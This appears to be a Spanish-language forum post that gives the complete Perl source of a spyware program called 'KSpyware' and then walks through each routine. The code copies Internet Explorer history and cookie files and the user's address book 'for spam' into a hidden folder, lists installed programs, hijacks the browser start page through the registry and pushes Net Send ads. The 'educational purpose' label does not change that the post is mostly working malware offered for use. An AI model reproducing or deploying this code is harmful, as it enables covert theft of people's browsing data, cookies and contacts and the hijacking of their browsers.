Codigo Fuente del Virus spyware
Código:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
Ahora les explicare para que sirve cada modulo de este codigo en perl.
Con este codigo obtendremos una lista de programas instalados en el sistema.
Código:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.
Código:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...
Código:
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.
Código:
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.
Código:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
Y con este el entry point...
Código:
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
.perl